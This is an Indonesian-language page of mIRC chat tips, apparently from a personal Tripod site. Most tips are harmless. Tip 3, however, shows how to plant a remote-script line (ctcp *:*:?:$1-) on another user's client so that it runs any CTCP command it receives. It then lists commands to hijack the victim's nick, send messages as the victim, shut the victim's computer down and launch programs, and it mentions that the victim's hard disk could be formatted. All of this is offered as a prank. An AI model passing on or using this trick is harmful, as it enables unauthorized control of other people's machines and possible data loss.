Make your own free website on Tripod.com

TIPS & TRIK Mirc

 

  1. Yayank gua kemana yah...

Ketik aja /whois nick, kalo nggak ketemu ketik /whowas nick untuk mengetahui kapan yayank join terakhir, atau kalo pengen tahu siapa aja yang ada di tempat itu, ketik /who ip-nya. Atau kamu pengen tahu yayank quit pesenya apa, ketik aja /msg nickserv info nick (khusus nick yang set private off).

2. Lagi-lagi join cenel anpa gue pengen karena di invite...

Cek Mirc option (alt+o),kemudian cari IRC , jangan klik "Autojoin Invite". Cuma itu aja kok nggak percaya?? buktiin sendiri .Ga bisa?? masuk #ngerumpi tanya ama the_well tuh pakarnya IRC.... :P-

3. Loh, Kompi gue kok tiba-tiba mati yah....dikerjain siapa yah.

Wah ada yang usil tuch .... tapi kamu bisa kok caranya ?? ketik ctcp*:*:?:$1- di remote lawan . Nggak tahu naruh remotenya ?? gini...ketk alt + r trus ketik perintah tadi trus simpan . Apa yang bisa kamu lakuin ?? misalnya nick paijo di remotenya udah ada remote, kamu bisa ketik:

a. Ubah nick paijo : ketik  /ctcp  paijo  nick gue_bego, nick paijo otomatis akan diganti menjadi gue_bego.

b. Kirim msg lewat paijo : ketik /ctcp paijo msg rani halo-2 bandung , maka rani akan terima msg lewat paijo.

c. Shut down komputer ketik : /ctcp paijo run rundll32.exe,user,exitwindows, maka komputer paijo akan mati.

d. jalnin program ketik : /ctcp paijo run iexplore.exe www.junni.da.ru, maka paijo akan buka IE site junni.

Dan perintah-perintah yang ada di irc bisa kamu gunakan untuk me-remote lawan. tpi jangan keterlaluan donk.......kasian dia ntar tiba-tiba komputernya mati, apalagi kamu bisa ngeformat hardisknya...... waduh.....jangan macam-macam deh .......sekali lagi kalo nggak bisa jalan, nanya aja ama the_well,....wah.....lagi-lagi jangan tewel....bosen....:P-.

4. Gimana yah caranya ketik /quit tanpa keluar dari chanel......

Wah.....gampang kok, tinggal tekan ctr+k kemudian ketik /quit kamu nggak bakalan dech qut dari IRC. gak percaya?? coba aja ....:P-

5. Gimana yah rasanya di kick OP....

Caranya  mudah...:

Ketikan di chanel :/say / HU HA HUO HUA, HIA HUA HUS, GOE GUA GUI, BU BUA BUI, HA HU HI, HIK HUK HAK, JUA JIU JAU, LUA LIU LAU, CIS CUS CAS, LO LOE LUA, LAG FLOOD FLAT 15x (nggak boleh kurang nggak boleh lebih)------>Tunggu aja beberapa detik, pasti dech kamu kick.